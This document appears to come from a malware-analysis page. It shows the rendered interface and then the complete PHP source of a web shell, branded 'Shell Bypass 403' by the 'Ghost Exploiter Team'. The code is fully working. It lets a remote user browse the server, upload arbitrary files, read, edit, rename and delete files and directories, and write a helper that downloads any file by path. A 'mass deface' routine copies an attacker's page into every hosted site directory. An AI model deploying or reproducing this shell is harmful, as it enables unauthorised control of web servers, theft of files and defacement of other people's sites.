<h3 class="dirnav">Directory >> <a href="/">/</a><a href="?dir=/var">var</a>/<a href="?dir=/var/www">www</a>/<a href="?dir=/var/www/html">html</a>/</h3> <form method="post" enctype="multipart/form-data">
<input type="file" name="upload">
<input type="submit" name="upl" value="Upload">
</form>
</div>
<center>
<!--Mass Deface-->
<form method="post" class="hide massform" id="massform">
<font color="#f00" size="6px">Mass Deface Auto Detect Domain</font><br><br><br>
<div class="inputmass">
<input class="mass" type="text" name="pwd" size="50" value="/var/www/html"><font color="silver" size="1px">/*Ubah Ke document_root untuk mass deface*/</font><br>
<input class="mass" type="text" name="namasc" size="50" placeholder="namafile.ext"><br>
</div>
<textarea name="scdeface" width="400px" placeholder="scdeface" class="massarea"></textarea>
<input type="submit" name="massdef" value="Start" class="btn edt"><br>
</form><!--Table-->
<table class="data-table" id="tabel">
<thead>
<tr class="stamp">
<th>File / Folder</th>
<th>Size</th>
<th>Action</th>
</tr>
</thead>
<tbody>
<tr>
<td style="color: lime">.</td>
<td style="color: lime"><center>-</center></td>
<td><center>
<div id="divneww" style="display:none">
<form method="POST">
<input name="createname" class="fileinput new" type="text" size="20" placeholder="nama" required="">
<select name="type">
<option disabled="disabled" selected="selected">type</option>
<option value="file">file</option>
<option value="dir">dir</option>
</select>
<input type="submit" value="Go" class="btn mini go" name="createnew">
</form>
</div>
<div id="divnew"><button class="btn newf" onclick="display("divnew","divneww")">+File/Dir</button></div> </center>
</td>
</tr>
<tr>
<td><a class="filename" href="?dir=/var/www/html&open=beneri.se_malware_analysis">beneri.se_malware_analysis</a></td>
<td style="color: lime;"><center>0KB</center></td>
<td><center><form method="POST" id="beneri.se_malware_analysis_form" class="hide">
<input name="newname" class="fileinput" type="text" size="20" value="beneri.se_malware_analysis" required="">
<input type="hidden" name="path" value="/var/www/html">
<input type="hidden" name="oldname" value="beneri.se_malware_analysis">
<input type="submit" value="Go" class="btn mini go">
</form>
<div id="beneri.se_malware_analysis_link">
<form method="post" class="fatas">
<input type="hidden" value="/var/www/html/beneri.se_malware_analysis" name="filedl">
<input type="hidden" value="/var/www/html" name="filepath">
<input type="submit" value="del" name="rmfile" class="btn mini rmf">
<a href="?dir=/var/www/html&ubah=beneri.se_malware_analysis" class="btn">edt</a><a class="btn" href="javascript:display("beneri.se_malware_analysis_link","beneri.se_malware_analysis_form");">ren</a></form><form action="fdl.php" method="post" class="fbawah">
<input type="hidden" value="/var/www/html" name="dlpath">
<input type="hidden" value="beneri.se_malware_analysis" name="dlname">
<input type="submit" value="dl" name="dlfile" class="btn mini rmf">
</form></div></center>
</td>
</tr>
<tr>
<td><a class="filename" href="?dir=/var/www/html&open=minishell.php">minishell.php</a></td>
<td style="color: lime;"><center>12KB</center></td>
<td><center><form method="POST" id="minishell.php_form" class="hide">
<input name="newname" class="fileinput" type="text" size="20" value="minishell.php" required="">
<input type="hidden" name="path" value="/var/www/html">
<input type="hidden" name="oldname" value="minishell.php">
<input type="submit" value="Go" class="btn mini go">
</form>
<div id="minishell.php_link">
<form method="post" class="fatas">
<input type="hidden" value="/var/www/html/minishell.php" name="filedl">
<input type="hidden" value="/var/www/html" name="filepath">
<input type="submit" value="del" name="rmfile" class="btn mini rmf">
<a href="?dir=/var/www/html&ubah=minishell.php" class="btn">edt</a><a class="btn" href="javascript:display("minishell.php_link","minishell.php_form");">ren</a></form><form action="fdl.php" method="post" class="fbawah">
<input type="hidden" value="/var/www/html" name="dlpath">
<input type="hidden" value="minishell.php" name="dlname">
<input type="submit" value="dl" name="dlfile" class="btn mini rmf">
</form></div></center>
</td>
</tr>
</tbody>
</table>
<!--Logger-->
</center></div></body></html>Original PHP code
<!-- Hak Cipta Ghost Exploiter Team
Thanks All Member GhostExploiterTeam -->
<?php
$xNamashell = "b3p45.php";//isi nama file mu
error_reporting(0);
@ob_clean();
if (isset($_GET['dir'])) {
$dir = $_GET['dir'];
} else {
$dir = getcwd();
}
?>
<!DOCTYPE html>
<html>
<head>
<title>Shell Bypass 403 GE-C666C</title>
</head>
<style>
@import url("https://fonts.googleapis.com/css?family=New+Rocker|Shadows+Into+Light&display=swap");
* {
font-family: monospace;
font-weight: 800;
}
body {
font-size: 120%;
color: #fff;
padding: 0;
margin: 25% 10% 10% 10%;
background-color: #111;
text-shadow: rgba(0,0,0,1) 2px 2px 0.1em;
}
table {
margin: auto;
margin-bottom: 20px;
width: 96%;
}
table td {
transition: all .5s;
}
.data-table {
border-collapse: collapse;
font-size: 110%;
min-width: 600px;
}
.data-table th,
.data-table td {
border: none;
padding: 7px 15px;
width: 33%;
}
h3.title{
margin-bottom: 20px;
margin-top: 0px;
text-align: left;
background-color: #f00;
padding: 10px;
font-weight: 900;
font-size: 160%;
font-family: New Rocker;
}
.data-table tbody td {
color: #fff;
background-color: #282828;
}
.data-table tbody td:nth-child(4),
.data-table tbody td:last-child {
text-align: left;
}
.data-table tbody td:first-child{
text-align: left;
}
.data-table tbody tr:nth-child(odd) td {
background-color: #222;
}
.data-table tbody tr:hover td {
background-color: #151515;
border-color: #ccc;
}
.data-table tbody tr.stamp td {
color: #fff;
background-color: #000;
}
.data-table tbody tr.data td.nick {
color: #f00;
}
.kotak{
border: 2px solid #f00;
width: 100%;;
border-radius: 6px;
box-shadow: rgba(0,0,0,1) 3px 3px 5em;
padding-bottom: 10px;
}
.btn{
background-color: #f00;
border-radius: 5px;
border: 2px solid red;
width: 75px;
height: 27px;
font-size: 0.8em;
font-weight: 600;
color: #fff;
outline: none;
margin: 4px;
font-weight: 900;
padding: 2px 3px;
text-shadow: none;
}
.btn:hover{
box-shadow: 0px 0px 2px 2px darkred;
}
a{
color: #fff;
text-decoration: none;
}
a:hover{
color: #fff;
}
.nav_up{
margin: 2%;;
margin-top: 0px;
}
.stamp th{
font-size: 140%;
}
.dirname{
color: #f00;
}
.filename{
color: #fff;
}
input.btn.mini{
width: 35px;
height: 24px;
}
.dirnav{
margin-bottom: 20px;
}
.dirnav a{
color: lime;
}
textarea{
width: 95.5%;
height: 400px;
}
.balik{
margin-right: 200px;
}
.data-table th.det,
.data-table td.det{
width: 25%;
}
.fileinput{
width: 100px;
}
.new{
width: 160px;
}
.newf{
width: 90px;
}
.hide{
display: none;
}
.rmf{
margin-right: -5px;
}
.go{
background-color: green;
border: none;
}
.go:hover{
box-shadow: 0px 0px 2px 2px darkgreen;
}
.fitur{
text-align: right;
margin-top: -15px;
margin-right: 1%;
}
.massarea{
font-size: 60%;
margin: 2%;
}
.mass{
margin-left: 2%;
margin-top: 1%;
margin-right: 2%;
font-size: 60%;
}
.massresult{
margin-top: 8%;
font-size: 80%;
margin-left: 2%;
text-align: left;
}
.inputmass{
text-align: left;
}
.massbt{
font-size: 60%;
}
.massform{
margin-top: 6%;
}
.fbawah,.fatas{
display: inline-block;
}
</style>
<body>
<div class="kotak">
<h3 class="title">Ghost Exploiter Team Official</h3>
<div class="fitur">
<button type="button" class="btn massbt" onclick="display('tabel','massform')">Mass Deface</button>
</div>
<div class="nav_up">
<?php
$dir = str_replace("\\", "/", $dir);
$dirs = explode("/", $dir);
foreach ($dirs as $key => $value) {
if ($value == "" && $key == 0){
echo '<h3 class="dirnav">Directory >> <a href="/">/</a>'; continue;
} echo '<a href="?dir=';
for ($i=0; $i <= $key ; $i++) {
echo "$dirs[$i]"; if ($key !== $i) echo "/";
} echo '">'.$value.'</a>/';
}
echo '</h3>';
if (isset($_POST['upl'])){
$namafile = $_FILES['upload']['name'];
$tempatfile = $_FILES['upload']['tmp_name'];
$tempat = $_GET['dir'];
$error = $_FILES['upload']['error'];
$ukuranfile = $_FILES['upload']['size'];
move_uploaded_file($tempatfile, $dir.'/'.$namafile);
echo "
<script>alert('file terupload!');</script>
";
}
?>
<form method="post" enctype="multipart/form-data">
<input type="file" name="upload">
<input type="submit" name="upl" value="Upload">
</form>
</div>
<center>
<!--Mass Deface-->
<?php
echo "
<form method='post' class='hide massform' id='massform'>
<font color='#f00' size='6px'>Mass Deface Auto Detect Domain</font><br><br><br>
<div class='inputmass'>
<input class='mass' type='text' name='pwd' size='50' value='$dir'><font color='silver' size='1px'>/*Ubah Ke document_root untuk mass deface*/</font><br>
<input class='mass' type='text' name='namasc' size='50' placeholder='namafile.ext'><br>
</div>
<textarea name='scdeface' width='400px' placeholder='scdeface' class='massarea'></textarea>
<input type='submit' name='massdef' value='Start' class='btn edt'><br>
</form>";
?>
<!--Table-->
<table class="data-table" id="tabel">
<thead>
<tr class="stamp">
<th>File / Folder</th>
<th>Size</th>
<th>Action</th>
</tr>
</thead>
<tbody>
<tr>
<td style="color: lime">.</td>
<td style="color: lime"><center>-</center></td>
<td><center>
<div id="divneww" style="display:none">
<form method="POST">
<input name="createname" class="fileinput new" type="text" size="20" placeholder="nama" required/>
<select name="type">
<option disabled="disabled" selected="selected">type</option>
<option value="file">file</option>
<option value="dir">dir</option>
</select>
<input type="submit" value="Go" class="btn mini go" name="createnew"/>
</form>
</div>
<?php
echo '<div id="divnew"><button class="btn newf" onclick=\'display("divnew","divneww")\'>+File/Dir</button></div>';
?>
</center>
</td>
</tr>
<?php
$scan = scandir($dir);
foreach ($scan as $directory) {
if (!is_dir($dir.'/'.$directory) || $directory == '.' || $directory == '..') continue;
echo '
<tr class="data">
<td class="det">
<a class="dirname" href="?dir='.$dir.'/'.$directory.'">'.dirlimit($directory).'</a>
</td>
<td style="color: red;"><center>--</center></td>
<td>
<center>';
echo '<form method="POST" id="'.clearspace($directory).'_form" class="hide">
<input name="newname" class="fileinput" type="text" size="20" value="'.$directory.'" required/>
<input type="hidden" name="path" value="'.$dir.'">
<input type="hidden" name="oldname" value="'.$directory.'">
<input type="submit" value="Go" class="btn mini go"/>
</form>';
echo '<div id="'.clearspace($directory).'_link">
<form method="post">
<input type="hidden" value="'.$dir.'/'.$directory.'" name="dirdl">
<input type="hidden" value="'.$dir.'" name="dirpath">
<input type="submit" value="del" name="rmdir" class="btn mini">';
echo '<a class="btn" href=\'javascript:display("'.clearspace($directory).'_link","'.clearspace($directory).'_form");\'>ren</a>';
echo '</form>
</div>
</center>
</td>
</tr>
';
}
foreach ($scan as $file) {
if (!is_file($dir.'/'.$file)) continue;
$jumlah = filesize($dir.'/'.$file)/1024;
$jumlah = round($jumlah, 3);
if ($jumlah >= 1024) {
$jumlah = round($jumlah/1024, 2).'MB';
} else {
$jumlah = $jumlah .'KB';
}
echo '
<tr>
<td><a class="filename" href="?dir='.$dir.'&open='.$file.'">'.wordlimit($file).'</a></td>
<td style="color: lime;"><center>'.$jumlah.'</center></td>
<td><center>';
echo '<form method="POST" id="'.clearfile($file).'_form" class="hide">
<input name="newname" class="fileinput" type="text" size="20" value="'.$file.'" required/>
<input type="hidden" name="path" value="'.$dir.'">
<input type="hidden" name="oldname" value="'.$file.'">
<input type="submit" value="Go" class="btn mini go"/>
</form>';
echo '
<div id="'.clearfile($file).'_link">
<form method="post" class="fatas">
<input type="hidden" value="'.$dir.'/'.$file.'" name="filedl">
<input type="hidden" value="'.$dir.'" name="filepath">
<input type="submit" value="del" name="rmfile" class="btn mini rmf">
<a href="?dir='.$dir.'&ubah='.$file.'" class="btn">edt</a>';
echo '<a class="btn" href=\'javascript:display("'.clearfile($file).'_link","'.clearfile($file).'_form");\'>ren</a>';
echo '</form><form action="fdl.php" method="post" class="fbawah">
<input type="hidden" value="'.$dir.'" name="dlpath">
<input type="hidden" value="'.$file.'" name="dlname">
<input type="submit" value="dl" name="dlfile" class="btn mini rmf">
</form></div></center>
</td>
</tr>
';
}
echo '
</tbody>
</table>
';
/*action*/
if (isset($_GET['open'])) {
echo '
<br />
<style>
table{
display: none;
}
</style>
<textarea>'.htmlspecialchars(file_get_contents($_GET['dir'].'/'.$_GET['open'])).'</textarea>
';
}
if (isset($_POST['rmfile'])) {
if (unlink($_POST['filedl'])) {
echo "<script>alert('Delete Ok !');window.location='?dir=".$_POST['filepath']."';</script>";
}
}
if (isset($_POST['rmdir'])){
$files = glob(''.$_POST['dirdl'].'/*');
foreach ($files as $file) {
if (is_file($file)){
unlink($file); // hapus file
}
}
if(rmdir($_POST['dirdl'])){
echo "<script>alert('Delete Ok !');window.location='?dir=".$_POST['dirpath']."';</script>";
}else{
echo "<script>alert('err ".$_POST['dirdl']."!');</script>";
}
}
if(isset($_GET['ubah'])){
if(isset($_POST['edit'])){
$fp = fopen($_POST['object'], 'w');
if(fwrite($fp,$_POST['edit'])){
echo "<script>alert('Edit Ok !');window.location='?dir=".$_GET['dir']."';</script>";
}else{
err();
}
fclose($fp);
}
$hell = $_GET['dir'];
$yeah = $_GET['ubah'];
$patc = "$hell/$yeah";
echo '<style>
table {
display: none;
}
</style>
<form method="post" action="">
<input type="hidden" name="object" value="'.$patc.'">
<textarea name="edit">'.htmlspecialchars(file_get_contents($patc)).'</textarea>
<a href="?dir='.$dir.'" class="balik"><=Back</a>
<button type="submit" name="go" value="Submit" class="btn edt">Liking</button>
</form>
';
}
if(isset($_POST['newname'])){
if(rename($_POST['path'].'/'.$_POST['oldname'], $_POST['path'] . '/' .$_POST['newname'])){
ok();
}else{
err();
}
}
if(isset($_POST['createnew']) && $_POST['createname'] != ''){
if($_POST['type'] == 'file'){
$newfl = $dir. '/' . $_POST['createname'];
if(isset($newfl)){
if(fopen($newfl,'w')){
ok();
}else{
err();
}
}
}elseif($_POST['type'] == 'dir'){
$newdir = $dir. '/' .$_POST['createname'];
if(mkdir($newdir)){
ok();
}else{
err();
}
}else{
echo "<script>alert('Pilih type !');</script>";
}
}
if(isset($_POST['massdef'])){
echo '<style>
table {
display: none;
}
</style>';
$nama = $_POST['namasc'];
$sc = $_POST['scdeface'];
$bikin = fopen($nama, "w");
fwrite($bikin, $sc);
fclose($bikin);
$root = $_POST['pwd'];
$scan = scandir($root);
echo "<div class='massresult'>";
echo "<font color='lime'>[ DETECTED DOMAINS ] : </font><br><br><textarea>";
foreach ( $scan as $a ) {
$dir = $a;
$full = $root.'/'.$a.'/'.$nama;
$ekse = @copy($nama, $full);
if($ekse) {
/*filtering dikit :v*/
if(preg_match('/[\w]+[.]+[a-z]+/i', $dir,$match)) {
echo "http://$dir/$nama\n";
}
}
}
echo "\n\nNB : Kalo ada dir/domain yang gak terdetect isi sendiri yak :v\nPutra Gans tq</textarea>";
echo "</div>";
}
$fdlvalue = '<?php
$file_url = $_POST["dlpath"]."/".$_POST["dlname"];
header("Content-Type: application/octet-stream");
header("Content-Transfer-Encoding: utf-8");
header("Content-disposition: attachment; filename=\"" . basename($file_url) . "\"");
readfile($file_url);
?> ';
$dlwrite = fopen('fdl.php', 'w');
fwrite($dlwrite, $fdlvalue);
fclose($dlwrite);
/*function*/
function wordlimit($file,$limit=26){
if(strlen($file)>$limit)
$word = mb_substr($file,0,$limit-3)."<font color=#f00>...</font>";
else
$word = $file;
return $word;
}
function dirlimit($directory,$limit=22){
if(strlen($directory)>$limit)
$dirlim = mb_substr($directory,0,$limit-3)."<font color=#fff>...</font>";
else
$dirlim = $directory;
return $dirlim;
}
function ok(){
echo "<script>alert('Berhasil !');window.location='';</script>";
}
function err(){
echo "<script>alert('Gagal !');window.location='';</script>";
}
function clearspace($directory){
return str_replace(" ","_",$directory);
}
function clearfile($file){
return str_replace(" ","_",$file);
}
?>
<!--Logger-->
<script type="text/jav